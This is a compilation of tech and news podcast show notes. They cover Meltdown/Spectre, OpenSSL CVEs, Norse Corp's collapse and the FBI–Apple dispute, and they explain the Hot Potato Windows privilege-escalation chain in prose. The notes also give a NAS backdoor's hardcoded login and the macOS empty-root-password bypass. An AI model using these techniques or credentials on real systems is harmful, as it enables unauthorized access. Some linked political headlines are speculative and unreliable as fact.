Show Notes: techsnap.systems/406

The post SACK Attack | TechSNAP 406 first appeared on Jupiter Broadcasting.

Show Notes: techsnap.systems/400

The post Supply Chain Attacks | TechSNAP 400 first appeared on Jupiter Broadcasting.

Show Notes/Links: linuxunplugged.com/294

The post Tainted Love | LINUX Unplugged 294 first appeared on Jupiter Broadcasting.

HD Video Feed | MP3 Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

What is Meltdown and Spectre

• Meltdown and Spectre

• These vulnerabilities have been present in most computers for nearly 20 years.

• Both vulnerabilities exploit performance features (caching and speculative execution) common to many modern processors to leak data via a so-called side-channel attack.

• What is a side channel?

From Wikipedia:

“… a side-channel attack is any attack based on information gained from the physical implementation of a cryptosystem, rather than brute force or theoretical weaknesses in the algorithms (compare cryptanalysis). For example, timing information, power consumption, electromagnetic leaks or even sound can provide an extra source of information, which can be exploited to break the system.”

• Spectre and Meltdown are side-channel attacks which deduce the contents of a memory location which should not normally be accessible by using timing to observe whether another, accessible, location is present in the cache.

• Meltdown is a CPU vulnerability. It works by using modern processors’ out-of-order execution to read arbitrary kernel-memory location. This can include personal data and passwords. This functionality has been an important performance feature. It’s present in many modern processors, most noticeably in 2010 and later Intel processors. By breaking down the wall between user applications and operating system’s memory allocations, it can potentially be used to spy on the memory of other programs and the operating systems.

• Spectre breaks down the barriers between different applications. You could theoretically use it to trick applications into accessing arbitrary program, but not kernel, memory locations. Spectre is harder to exploit than Meltdown, but it is also harder to mitigate, and it attacks even more chip architectures than Meltdown does. For now, there are no universal Spectre patches.

• Meltdown And Spectre Explained

• The timeline: How we got to Spectre and Meltdown A Timeline  

• ‘It Can’t Be True.’ Inside the Semiconductor Industry’s Meltdown

Behind the Scenes all is not well

• How Tier 2 cloud vendors banded together to cope with Spectre and Meltdown
• FreeBSD was made aware of Meltdown and Spectre in late December. There’s currently no ETA for mitigation.
• heads up: Fix for intel hardware bug will lead to performance regressions
• LKML: Tom Lendacky: [PATCH] x86/cpu, x86/pti: Do not enable PTI on AMD processors

Meltdown and Spectre Patch Performance Hit

• Degraded performance after forced reboot due to AWS instance maintenance
• Fortnite takes performance hit from ‘Meltdown,’ says Epic
• Meltdown & Specter: Intel downs performance

• Meltdown and Specter – Performance according to Microsoft under Win 7 and 8 worse than under Win 10

• Intel releases breakdown of performance slowdown on Windows 10 after Spectre and Meltdown patches: ~6% for 8th-gen CPUs, ~7% for 7th-gen, ~8% for 6th-gen  

Protecting our Google Cloud customers from new vulnerabilities without impacting performance

With the performance characteristics uncertain, we started looking for a “moonshot”—a way to mitigate Variant 2 without hardware support. Finally, inspiration struck in the form of “Retpoline”—a novel software binary modification technique that prevents branch-target-injection, created by Paul Turner, a software engineer who is part of our Technical Infrastructure group. With Retpoline, we didn’t need to disable speculative execution or other hardware features. Instead, this solution modifies programs to ensure that execution cannot be influenced by an attacker.

What’s the fix for Meltdown and Spectre?

• Meltdown, Spectre bug patch slowdown gets real

• Available Spectre and Meltdown patches

• PCID is now a critical performance/security feature on x86 – Google Groups

Checking yourself and the outlook for 2018

• spectre-meltdown-checker:
• Prepare yourself and your company for the fact that this could be a trend for 2018.

• Several researches converged on these flaws at once. TechSNAP predicts that means more are coming, and folks like Greg KH have suggested just as much.

• Why Raspberry Pi isn’t vulnerable to Spectre or Meltdown – Raspberry Pi

macOS High Sierra’s App Store System Preferences Can Be Unlocked With Any Password

A bug report submitted on Open Radar this week has revealed a security flaw in the current version of macOS High Sierra that allows the App Store menu in System Preferences to be unlocked with any password.

• Major macOS High Sierra Bug Allows Full Admin Access Without Password  

The bug, discovered by developer Lemi Ergin, lets anyone log into an admin account using the username “root” with no password. This works when attempting to access an administrator’s account on an unlocked Mac, and it also provides access at the login screen of a locked Mac.

WD My Cloud NAS devices have hard-wired backdoor

The backdoor, detailed here, lets anyone log in as user mydlinkBRionyg with the password abc12345cba.

Feedback

+ New video feed https://techsnap.systems/video

• How could I measure all of these overhead performance hits
• Perfmon
• Troubleshooting with Sysinternals Tools – Windows Sysinternals | Microsoft Docs
• ProcDump – Windows Sysinternals | Microsoft Docs

• Process Monitor – Windows Sysinternals | Microsoft Docs

• MySQL Replication Woes · Slexy.org Pastebin

• Big DELETEs – MariaDB Knowledge Base

The post Performance Meltdown | TechSNAP 351 first appeared on Jupiter Broadcasting.

RSS Feeds:

HD Video Feed | MP3 Feed | iTunes Feed

Become a supporter on Patreon:

Episode Links

• Fedora 27 released — The Workstation edition of Fedora 27 features GNOME 3.26. In the new release, both the Display and Network configuration panels have been updated, along with the overall Settings panel appearance improvement.
• Firefox 57 arrives — It’s by far the biggest update we’ve had since we launched Firefox 1.0 in 2004
• There’s an option for people who don’t like change — a fork of the Mozilla code-base pre-Servo/Rust… Basically for those not liking the direction of Firefox with v57 rolling out the Quantum changes, etc.
• Ubuntu Unity 7 flavour might be on the horizon — A proposal to create a new community Ubuntu flavor which uses the Unity 7 desktop by default is gathering support within the Ubuntu community.
• LTS kernel 4.14 released — Anyway, go out and test the new 4.14 release, that is slated to be the
  next LTS kernel – and start sending me pull request for the 4.15 merge
  window.
• RISC-V support may be coming to 4.15 — RISC-V is hoping to see mainline with Linux 4.15. We’ve known for a while now about their mainline ambitions for 4.15 and a pull request was sent today, but it remains to be seen yet if Linus Torvalds will pull it for this merge window.
• Red Hat announces ARM version of RHEL — Red Hat Enterprise Linux 7.4 for ARM, the first commercial release for this architecture.
• Oneplus backdoor — OnePlus accidentally left in place a diagnostic testing application made by Qualcomm. After decompiling this application, he discovered that it can be exploited to grant root access—effectively acting as a backdoor.

The post Linux Action News 28 first appeared on Jupiter Broadcasting.

MP3 Feed | HD Video Feed | iTunes Feed

Become a supporter on Patreon:

— Show Notes: —

— The Cliff Notes —

• Tails 3.0 Security Distro

• Tails 3.0 is out

• Tails Version 3.0 Features

• Steam is Now on Flatpak

• Telegram Approached by US Intelligence

— Noobs Corner —

Check out the Ask Noah Dashboard

— Stay In Touch —

Find all the resources for this show on the Ask Noah Dashboard

Ask Noah Dashboard

Need more help than a radio show can offer? Altispeed provides commercial IT services and they’re excited to offer you a great deal for listening to the Ask Noah Show. Call today and ask about the discount for listeners of the Ask Noah Show!

Altispeed Technologies

Contact Noah

asknoah [at] jupiterbroadcasting.com

— Twitter —

• Noah – Kernellinux
• Ask Noah Show
• Altispeed Technologies
• Jupiter Broadcasting

The post Tails of Privacy | Ask Noah 13 first appeared on Jupiter Broadcasting.

HD Video Feed | MP3 Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

New password guidelines say everything we thought about passwords is wrong

• No more periodic password changes

• No more imposed password complexity

• Mandatory validation of newly created passwords against a list of commonly-used, expected, or compromised passwords.

• We recommend you use a password manager, use a different password on every login

• Rainbow tables used to convert hashes to passwords

Enterprise hard disks are faster and use more power, but are they more reliable?

• The enterprise disks also use more power: 9W idle and 10W operational, compared to 7.2W idle and 9W operational for comparable consumer disks.

• If you have one or two spindles, that’s no big deal, but each Backblaze rack has 20 “storage pods” with 60 disks each. An extra 2.2kW for an idle rack is nothing to sniff at.

• Other HGST models are also continuing to show impressive longevity, with three 4TB models and one 3TB model both boasting a sub-1 percent annualized failure rate.

Don’t trust OAuth: Why the “Google Docs” worm was so convincing

• Access to all your mail

• access to any of your google hangout chats

• access to all your contacts

• makes a good case for encryption/decryption at the client

• OAuth

Feedback

• Intel AMT bug

• bhyve VGA pass-through see also mailing list post

• Amazing, and keep it up!

• Borg Backup see Borg Documentation

  • Borg demonstration

• inexpensive, managed switches

Round Up:

• Why Security Backdoors are Bad (Common Sense Version)

• How to remote hijack computers using Intel’s insecure chips: Just use an empty login string

• Massive vulnerability in Windows Defender leaves most Windows PCs vulnerable

• NASA wants YOU (to make its Fortran code run faster)

The post All Drives Die | TechSNAP 318 first appeared on Jupiter Broadcasting.

HD Video Feed | MP3 Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

Red alert! Intel patches remote execution hole that’s been hidden in biz, server chips since 2008

• Bug is in Intel’s Active Management Technology (AMT), Standard Manageability (ISM) and Small Business Technology (SBT) firmware versions 6 to 11.6.

• Every Intel platform with either Intel Standard Manageability, Active Management Technology, or Small Business Technology, from Nehalem in 2008 to Kaby Lake in 2017 has a remotely exploitable security hole in the IME (Intel Management Engine)

• Are you affected? Read this!

Tarsnap

• Costs about $0.75 a day – storing about 87G total, and adding about 1.6GB / month

• I have not deleted any old backups since I started.

• Dan’s first big backup with Tarsnap

Feedback

• bareos – a bacula fork

• Backing up a Raspberry Pi TB disk photos

  • rdiff-backup
  • rsnapshot
  • duplicity
  • Borg

• mixing HDD batches in raid

Round Up:

• Why use Postgres (Updated for last 5 years) – Craig Kerstiens

• That grumpy BSD guy: Forcing the password gropers through a smaller hole with OpenBSD’s PF queues

• N.S.A. Halts Collection of Americans’ Emails About Foreign Targets – The New York Times

The post Some Fishy Chips | TechSNAP 317 first appeared on Jupiter Broadcasting.

It’s our uniquely qualified take on the FBI’s battle to get access to one of the San Bernardino shooter’s iPhones. Our coverage captures the core issues, why it is about setting a precedent, and how Apple could lose big if they don’t change their argument.

Plus the media’s scare on phone privacy at just the right time, an update on the Syrian ceasefire, Russia’s plans to snap some pictures of your backyard, a 2016 race update, and much more!

Direct Download:

Video | MP3 Audio | OGG Audio | Torrent | YouTube

RSS Feeds:

Video Feed | MP3 Feed | OGG Feed | HD Torrent | Mobile Torrent | iTunes

Become an Unfilter supporter on Patreon:

— Episode Links —

Episode Links:

• Inside the FBI’s encryption battle with Apple | Technology | The Guardian
• Secret Memo Details U.S.’s Broader Strategy to Crack Phones – Bloomberg Business
• Senate intel chief backs off on bill criminalizing refusal to aid decryption | Ars Technica
• FBI Won’t Explain Its Bizarre New Way of Measuring Its Success Fighting Terror
• Painkiller deaths drop by 25% in states with legalized medical marijuana | Minds
• San Bernardino County Calls the FBI Liars Over Terrorist’s iCloud Account [Updated]
• Russia wants to fly over US with advanced digital camera – Business Insider
• The Dangerous All Writs Act Precedent in the Apple Encryption Case – The New Yorker
• We Could Not Look the Survivors in the Eye if We Did Not Follow this Lead – Lawfare
• NPR One
• NPR One
• Justice Department Wants Apple to Extract Data From 12 Other iPhones – Mac Rumors
• Narrow Focus May Aid F.B.I. in Apple Case – The New York Times
• Justice Department Seeks to Force Apple to Extract Data From About 12 Other iPhones – WSJ
• Edward Snowden on Twitter: “Journalists: Crucial details in the @FBI v. #Apple case are being obscured by officials. Skepticism here is fair: https://t.co/lEVEvOxcNm”
• Judge says Clinton aides should testify under oath about emails | TheHill
• Apple will argue that FBI’s court order violates its free speech rights – LA Times
• Trump: As president, I would prosecute Clinton | Washington Examiner
• On FBI’s Interference with iCloud Backups | Zdziarski’s Blog of Things
• John Brennan On The FBI-Apple Standoff, ISIS And His Future At The CIA : The Two-Way : NPR
• Hot Mic Captures Trump Chatting With Morning Joe Hosts: “You Had Me Almost As a Legendary Figure”
• Solid support for Apple in iPhone encryption fight – Reuters/Ipsos
• NPR One
• WikiLeaks – NSA Targets World Leaders for US Geopolitical Interests
• MH17 report identifies Russian soldiers suspected of downing plane in Ukraine | World news | The Guardian
• No, The FBI Does Not ‘Need’ The Info On Farook’s iPhone; This Is Entirely About The Precedent | Techdirt

The post Cooking The Precedent | Unfilter 177 first appeared on Jupiter Broadcasting.

Apple VS the FBI, Privacy vs Security. The big false debate behind held in the media this week, we cut the crap and discuss the who is really pressing Apple, and what might be at stake in the big picture.

Plus a look at word events of the week, the big oil cut back that’s coming, and why you really should be freaking out about ISIS.

Direct Download:

Video | MP3 Audio | OGG Audio | Torrent | YouTube

RSS Feeds:

Video Feed | MP3 Feed | OGG Feed | HD Torrent | Mobile Torrent | iTunes

Become an Unfilter supporter on Patreon:

Show Notes:

— Episode Links —

• Marijuana Legalization in Colorado Is Killing Mexican Drug Cartels : Politics : Latin Post
• Dont_Panic_Making_Progress_on_Going_Dark_Debate.pdf
• CIA was Hacking Senate Emails, Watch the Director Throw a Tantrum When He’s Called Out for It | The Free Thought Project
• Hillary Clinton and Henry Kissinger: It’s Personal. Very Personal. | Mother Jones
• Blog: Debbie Wasserman Schultz asked to explain how Hillary lost NH primary by 22% but came away with same number of delegates
• Syria Civil War: Turkey confirms military strikes against Assad regime troops | Middle East | News | The Independent
• Saudi deploys jets in Turkey for anti-IS fight – Yahoo News
• Turkey shells northern Syria for second day: monitor | Reuters
• CSPAN on Twitter: “Pres Reagan “to fulfill our constitutional obligation of restoring” #SCOTUS to full strength https://t.co/kz218scmJL https://t.co/P0CMoQMB7i”
• Assad ‘will be removed by force’ if peace talks fail, Saudi Foreign Minister claims | Middle East | News | The Independent
• What defeat? Despite NH loss, ‘super’ insiders give Clinton early delegate edge | Fox News
• America? Marco Rubio’s U.S. Presidential ad mistakenly spotlights Vancouver (VIDEO)
• Detectives question lack of autopsy in Scalia death | New York Post
• Michael Savage: ‘Was Scalia murdered?’
• Scalia’s death boosts legal chances for Obama’s climate plan
• Flint’s poisoned water was among the most expensive in the country – The Washington Post
• Henry Kissinger’s War Crimes Are Central to the Divide Between Hillary Clinton and Bernie Sanders
• U.S. Hacked Into Iran’s Critical Civilian Infrastructure For Massive Cyberattack, New Film Claims – BuzzFeed News
• US Marshals arresting people for not paying their federal student loans – Story | KRIV
• ISIS, facing cash shortage, cuts back on perks and salaries | Fox News
• The new Cold War in the Mediterranean | Fox News
• EFF to Support Apple in Encryption Battle | Electronic Frontier Foundation
• ACLU Comment on FBI Effort to Force Apple to Unlock iPhone | American Civil Liberties Union
• EFF at 25: Remembering the Case that Established Code as Speech | Electronic Frontier Foundation
• Why the FBI’s request to Apple will affect civil rights for a generation | Macworld
• Ronald Reagan Once Urged Senate To Act On Lame-Duck Supreme Court Nomination Of Anthony Kennedy
• Obama’s Election Year Supreme Court Choice is Not Unprecedented – NBC News
• List of Democratic Party superdelegates, 2016 – Wikipedia, the free encyclopedia
• Sanders supporters revolt against superdelegates

The post Open That iPhone | Unfilter 176 first appeared on Jupiter Broadcasting.

A new openSSL exploit, cyber security firm Norse implodes & the Windows Hot Potato flaw that’s been around for over a decade.

Plus great questions, our answers, a rockin round up & much, much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

OpenSSL Exploit

• Official Advisory
• The OpenSSL team announced versions 1.0.2f and 1.0.1r to fix a number of vulnerabilities
• The first issue, DH small subgroups (CVE-2016-0701), is classified as “High Severity”
• “Historically OpenSSL usually only ever generated DH parameters based on “safe” primes. More recently (in version 1.0.2) support was provided for generating X9.42 style parameter files such as those required for RFC 5114 support. The primes used in such files may not be “safe”. Where an application is using DH configured with parameters based on primes that are not “safe” then an attacker could use this fact to find a peer’s private DH exponent.”
• “OpenSSL provides the option SSL_OP_SINGLE_DH_USE for ephemeral DH (DHE) in TLS. It is not on by default. If the option is not set then the server reuses the same private DH exponent for the life of the server process and would be vulnerable to this attack. It is believed that many popular applications do set this option and would therefore not be at risk.”
• “OpenSSL 1.0.1 is not affected by this CVE because it does not support X9.42 based parameters”
• Another issue, SSLv2 doesn’t block disabled ciphers (CVE-2015-3197), is classified as “Low Severity”
• “A malicious client can negotiate SSLv2 ciphers that have been disabled on the server and complete SSLv2 handshakes even if all SSLv2 ciphers have been disabled, provided that the SSLv2 protocol was not also disabled via SSL_OP_NO_SSLv2”
• So if your server disabled all of the SSLv2 ciphers, but didn’t disable the SSLv2 protocol itself, SSLv2 could still be used. This is likely higher severity than it seems, since it could be used in a downgrade attack
• A third issue was an update on DHE man-in-the-middle protection (Logjam)
• “OpenSSL added Logjam mitigation for TLS clients by rejecting handshakes with DH parameters shorter than 768 bits in releases 1.0.2b and 1.0.1n. This limit has been increased to 1024 bits in this release, to offer stronger cryptographic assurance for all TLS connections using ephemeral Diffie-Hellman key exchange.”
• “As per the previous announcements support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade. Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.”

Krebs: Norse Corp. Implodes

• Norse Corp is a security startup that has made a lot of headlines, many surrounding its graphical “Attack Map” of the Internet
• Last month, Norse unexpectedly laid off more than 30% of its workforce
• Now, Norse’s CEO, Sam Glines, has been asked to step down by the board of directors
• “sources say the company’s investors have told employees that they can show up for work on Monday but that there is no guarantee they will get paid if they do.”
• “Glines agreed earlier this month to an interview with KrebsOnSecurity but later canceled that engagement without explanation.”
• “Two sources at Norse said the company’s assets will be merged with networking firm SolarFlare, which has some of the same investors and investment capital as Norse. Neither Norse nor SolarFlare would comment for this story.
• “Update, Feb. 1, 12:34 p.m. ET: SolarFlare CEO Russell Stern just pinged me to say that “there has been no transaction between Norse and SolarFlare.””
• “A careful review of previous ventures launched by the company’s founders reveals a pattern of failed businesses, reverse mergers, shell companies and product promises that missed the mark by miles”
• “In the tech-heavy, geek-speak world of cybersecurity, infographics and other eye candy are king because they promise to make complicated and boring subjects accessible and sexy. And Norse’s much-vaunted interactive attack map is indeed some serious eye candy: It purports to track the source and destination of countless Internet attacks in near real-time, and shows what appear to be multicolored fireballs continuously arcing across the globe.”
• “Several departing and senior Norse employees said the company’s attack data was certainly voluminous enough to build a business upon — if not especially sophisticated or uncommon. But most of those interviewed said Norse’s top leadership didn’t appear to be interested in or capable of building a strong product behind the data. More worryingly, those same people said there are serious questions about the validity of the data that informs the company’s core product.”
• “Norse Corp. and its fundamental technology arose from the ashes of several companies that appear to have been launched and then acquired by shell companies owned by Norse’s top executives — principally the company’s founder and chief technology officer Tommy Stiansen. Stiansen”
• “This acquisition process, known as a “reverse merger” or “reverse takeover,” involves the acquisition of a public company by a private company so that the private company can bypass the lengthy and complex process of going public. Reverse mergers are completely legal, but they can be abused to hide the investors in a company and to conceal certain liabilities of the acquired company, such as pending lawsuits or debt. In 2011, the U.S. Securities and Exchange Commission (SEC) issued a bulletin cautioning investors about plunking down investments in reverse mergers, warning that they may be prone to fraud and other abuses.”
• The founders of Norse Corp. got their start in 1998 with a company called Cyco.net (pronounced “psycho”). According to a press release issued at the time, “Cyco.net was a New Mexico based firm established to develop a network of cyber companies.” “This site is a lighthearted destination that will be like the ‘People Magazine’ of the Internet”
• “In 2003, Cyco.net acquired Orion Security Services, a company founded by Stiansen, Norse’s current CTO and founder and the one Norse executive who is actually from Norway. Orion was billed as a firm that provides secure computer network management solutions, as well as video surveillance systems via satellite communications.”
• “Despite claims that Cyco.net was poised to “rocket into the deepest riches of cyberspace,” it somehow fell short of that destination and ended up selling cigarettes online instead. Perhaps inevitably, the company soon found itself the target of a lawsuit by several states led by the Washington state attorney general that accused the company of selling tobacco products to minors, failing to report cigarette sales and taxes, and for falsely advertising cigarettes as tax-free.”
• “In 2005, Cyco.net changed its name to Nexicon, but only after acquiring by stock swap another creation by Stiansen — Pluto Communications — a company formed in 2002 and whose stated mission was to provide “operational billing solutions for telecom networks.” Again, Urrea would issue a press release charting a course for the company that would have almost no bearing on what it actually ended up doing.”
• “In June 2008, Sam Glines — who would one day become CEO of Norse Corp. — joined Nexicon and was later promoted to chief operating officer. By that time, Nexicon had morphed itself into an online copyright cop, marketing a technology they claimed could help detect and stop illegal file-sharing. The company’s “GetAmnesty” technology sent users a pop-up notice explaining that it was expensive to sue the user and even more expensive for the user to get sued. Recipients of these notices were advised to just click the button displayed and pay for the song and all would be forgiven.”
• “In November 2008, Nexicon was acquired by Priviam, another shell company operated by Stiansen and Nexicon’s principals. Nexicon went on to sign Youtube.com and several entertainment studios as customers. But soon enough, reports began rolling in of rampant false-positives — Internet users receiving threatening legal notices from Nexicon that they were illegally sharing files when they actually weren’t. Nexicon/Priviam’s business began drying up, and it’s stock price plummeted.”
• “In September 2011, the Securities and Exchange Commission revoked the company’s ability to trade its penny stock (then NXCO on the pink sheets), noting that the company had failed to file any periodic reports with the SEC since its inception. In June 2012, the SEC also revoked Priviam’s ability to trade its stock, citing the same compliance failings that led to the de-listing of Nexicon.”
• “By the time the SEC revoked Nexicon’s trading ability, the company’s founders were already working to reinvent themselves yet again. In August 2011, they raised $50,000 in seed money from Capital Innovators to jump-start Norse Corp. A year later, Norse received $3.5 million in debt refinancing, and in December 2013 got its first big infusion of cash — $10 million from Oak Investment Partners. In September 2015, KPMG invested $11.4 million in the company.”
• “Several former employees say Stiansen’s penchant for creating shell corporations served him well in building out Norse’s global sensor network. Some of the sensors are in countries where U.S. assets are heavily monitored, such as China. Those same insiders said Norse’s network of shell corporations also helped the company gain visibility into attack traffic in countries where it is forbidden for U.S. firms to do business, such as Iran and Syria.”
• By 2014, former employees say Norse’s systems were collecting a whopping 140 terabytes of Internet attack and traffic data per day.”
• Norse’s senior data scientist says she “wasn’t actually given access to all that data until the fall of 2015 — seven months after being hired as Norse’s chief data scientist — and that when she got the chance to dig into it, she was disappointed: The information appeared to be little more than what one might glean from a Web server log — albeit millions of them around the world.”
• “The data isn’t great, and it’s pretty much the same thing as if you looked at Web server logs that had automated crawlers and scanning tools hitting it constantly. But if you know how to look at it and bring in a bunch of third-party data and tools, the data is not without its merits, if not just based on the sheer size of it.”
• “Landesman and other current and former Norse employees said very few people at the company were permitted to see how Norse collected its sensor data, and that Norse founder Stiansen jealously guarded access to the back-end systems that gathered the information.”
• This seems to be to cover up the fact that there was no “secret sauce”, it was all smoke and mirrors
• “With this latest round of layoffs, if Tommy got hit by a bus tomorrow I don’t think there would be a single person in the company left who understands how the whole thing works,” said one former employee at Norse who spoke on condition of anonymity.
• “Stuart McClure, president and founder of the cybersecurity firm Cylance, said he found out just how reluctant Stiansen could be to share Norse data when he visited Stiansen and the company’s offices in Northern California in late 2014. McClure said he went there to discuss collaborating with Norse on two upcoming reports: One examining Iran’s cyber warfare capabilities, and another about exactly who was responsible for the massive Nov. 2014 cyber attack on Sony Pictures Entertainment.”
• “The FBI had already attributed the attack to North Korean hackers. But McClure was intrigued after Stiansen confidentially shared that Norse had reached a vastly different conclusion than the FBI: Norse had data suggesting the attack on Sony was the work of disgruntled former employees.”
• “McClure said he recalls listening to Stiansen ramble on for hours about Norse’s suspicions and simultaneously dodging direct questions about how it had reached the conclusion that the Sony attack was an inside job.”
• “I just kept going back to them and said, ‘Tommy, show me the data.’ We wanted to work with them, but when they couldn’t or wouldn’t produce any data or facts to substantiate their work, we couldn’t proceed.”
• “Conversely, Norse’s take on Iran’s cyber prowess (PDF) was trounced by critics as a deeply biased, headline-grabbing report. It came near the height of international negotiations over lifting nuclear sanctions against Iran, and Norse had teamed up with the American Enterprise Institute, a conservative think tank that has traditionally taken a hard line against threats or potential threats to the United States.”
• “In its report, Norse said it saw a half-million attacks on industrial control systems by Iran in the previous 24 months — a 115 percent increase in attacks. But in a scathing analysis of Norse’s findings, critical infrastructure security expert Robert M. Lee said Norse’s claim of industrial control systems being attacked and implying it was definitively the Iranian government was disingenuous at best. Lee said he obtained an advanced copy of an earlier version of the report that was shared with unclassified government and private industry channels, and that the data in the report simply did not support its conclusions.”
• “KrebsOnSecurity interviewed almost a dozen current and former employees at Norse, as well as several outside investors who said they considered buying the firm. None but Landesman would speak on the record. Most said Norse’s data — the core of its offering — was solid, if prematurely marketed as a way to help banks and others detect and deflect cyber attacks.”
• The problem seems to be that the top executives of the company we more interested in getting investments based on the “Attack Map” and their marketing, than actually building the product
• “I think they just went to market with this a couple of years too soon,” said one former Norse employee who left on his own a few months prior to the January 2016 layoffs, in part because of concerns about the validity of the data that the company was using to justify some of its public threat reports. “It wasn’t all there, and I worried that they were finding what they wanted to find in the data. If you think about the network they built, that’s a lot of power.”
• After being fired, some former employees started doing some deeper digging
• “I realized that, oh crap, I think this is a scam,” Landesman said. “They’re trying to draw this out and tap into whatever the buzzwords du jour there are, and have a product that’s going to meet that and suck in new investors.”
• “These shell companies formed by [the company’s founders] bilked investors,” Landesman said. “Had anyone gone and investigated any of these partnerships they were espousing as being the next big thing, they would have realized this was all smoke and mirrors.”

Windows Privilege Escalation — Hot Potato

• Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
• If this sounds vaguely familiar, it’s because a similar technique was disclosed by the guys at Google Project Zero – https://code.google.com/p/google-security-research/issues/detail?id=222 . In fact, some of our code was shamelessly borrowed from their PoC and expanded upon.
• Using this technique, they can elevate their privilege on a Windows workstation from the lowest levels to “NT AUTHORITY\SYSTEM” – the highest level of privilege available on a Windows machine.
• This is important because many organizations unfortunately rely on Windows account privileges to protect their corporate network.
• This is perfect for the island hopping technique we frequently talk about on TechSNAP.
• The techniques that this exploit uses to gain privilege escalation aren’t new, but the way they are combined is. Microsoft is aware of all of these issues and has been for some time (circa 2000). These are unfortunately hard to fix without breaking backward compatibility and have been leveraged by attackers for over 15 years.

• The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches.

• Part One: Local NBNS Spoofer

• If we can know ahead of time which hostname a target machine (in this case our target is 127.0.0.1) will be sending an NBNS query for, we can craft a fake response and flood the target host with NBNS responses very quickly (since it is a UDP protocol).

• One complication is that a 2-byte field in the NBNS packet, the TXID, must match in the request and response, and we are unable to see the request. We can overcome this by flooding quickly and iterating over all 65536 possible values.
• What if the network we are targeting has a DNS record for the host we want to spoof?

• We can use a technique called UDP port exhaustion to force ALL DNS lookups on the system to fail. All we do is bind to EVERY single UDP port. This causes DNS to fail because there will be no available UDP source port for the request. When DNS fails, NBNS will be the fallback.

• Part Two: Fake WPAD Proxy Server

• In Windows, Internet Explorer by default will automatically try to detect network proxy setting configuration.

• This also surprisingly applies to some Windows services such as Windows Update, but exactly how and under what conditions seems to be version dependent.
• With the ability to spoof NBNS responses, we can target our NBNS spoofer at 127.0.0.1. We flood the target machine (our own machine) with NBNS response packets for the host “WPAD”, or “WPAD.DOMAIN.TLD”, and we say that the WPAD host has IP address 127.0.0.1.
• At the same time, we run an HTTP server locally on 127.0.0.1, configured with a response at the URL IE will be checking.
• This will cause all HTTP traffic on the target to be redirected through our server running on 127.0.0.1.

Part Three: HTTP -> SMB NTLM Relay

• NTLM relay is a well known, but often misunderstood attack against Windows NTLM authentication. The NTLM protocol is vulnerable to man-in-the-middle attacks. If an attacker can trick a user into trying to authenticate using NTLM to his machine, he can relay that authentication attempt to another machine!
• Microsoft patched this by disallowing same-protocol NTLM authentication using a challenge that is already in flight. What this means is that SMB->SMB NTLM relay from one host back to itself will no longer work. However cross-protocol attacks such as HTTP->SMB will still work with no issue!
• With all HTTP traffic now presumably flowing through an HTTP server that we control, we can do things like redirect them somewhere that will request NTLM authentication.
• In the Potato exploit, all HTTP requests are redirected with a 302 redirect to “https://localhost/GETHASHESxxxxx”, where xxxxx is some unique identifier. Requests to “https://localhost/GETHASHESxxxxx” respond with a 401 request for NTLM authentication.
• Any NTLM credentials are then relayed to the local SMB listener to create a new system service that runs a user-defined command.

• When the HTTP request in question originates from a high privilege account, for example, when it is a request from the Windows Update service, this command will run with “NT AUTHORITY\SYSTEM” privilege!

• Windows 7 can be fairly reliably exploited through the Windows Defender update mechanism.

• Wince Windows Server doesn’t come with Defender, we need an alternate method. Instead we’ll simply check for Windows updates.
• In the newest versions of Windows, it appears that Windows Update may no longer respect the proxy settings set in “Internet Options”, or check for WPAD. Instead proxy settings for Windows Update are controlled using “netsh winhttp proxy…”
• Instead for these versions, we rely on a newer feature of Windows, the “automatic updater of untrusted certificates”
• It’s unclear whether this attack would work when SMB signing is enabled. The exploit as released currently does not, but this may just be due to lack of SMB signing support in the CIFS library they’re using.

Feedback:

• Some Questions for TechSnap From an aspiring SysAdmin

• ZFS on WD Green Drives?

• Question on storage arrangement

• Compiling ports as root is bad practice?

Round Up:

• Alrawi, the ISIS encrypted messaging app, does not exist
• Want WiFi? Touch the banana
• Microsoft’s new way of cooling its data centers: Throw them in the sea
• LostPass, a new phishing attack against LastPass
• Good Riddance to Oracle’s Java Plugin
• Turning a $30 D-Link camera into a backdoor on your network
• Smart thermostats leave users cold
• Security lessons from the fall of the Tunnel Rat King
• Configuring additional LSA protections for Windows
• Talos identifies ‘snowshoe’ spam, moderately sized campaigns designed to fly under the radar, may account for us to 15% of all spam
• Casino sues security firm for failing to contain malware infections
• The fall of Target Canada — Mostly the fault of bad enterprise software, and bad implementation
• Microsoft will only support newer processors on the latest verison of windows
• SSH backdoor found in network devices from Fortinet
• Backdoor in bitcoin wallet software causes exchange to lose over $5 million, depresses value of lightcoin
• Geek productivity pattern
• Measuring the snow in Rack Units

The post Hot Norse Potato | TechSNAP 252 first appeared on Jupiter Broadcasting.

We break down the Bicycle attack against SSL, the story of Brian Krebs’s PayPal account getting hacked & the scoop on the Juniper Saga.

Plus some great questions, our answers, a news breaking round up & much more!

Thanks to:

• Get Paid to Write for DigitalOcean

Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

— Show Notes: —

The Bicycle Attack against SSL/TLS

• Security Researcher Guido Vranken has published a new attack against all versions to SSL/TLS
• “While the sound configuration of both endpoints of a connection is understood to prevent the decoding from ciphertext to plaintext without having access to the private key(s), transactions conducted over a channel embedded in TLS leak various types of information.”
• “A lot of research has been performed on how to stack up these different ‘knowns’ in order to meticulously reconstruct the user’s actions, given that the encrypted streams are known to an observer who is or has been listening in on the ‘secure’ transmission between two endpoints.”
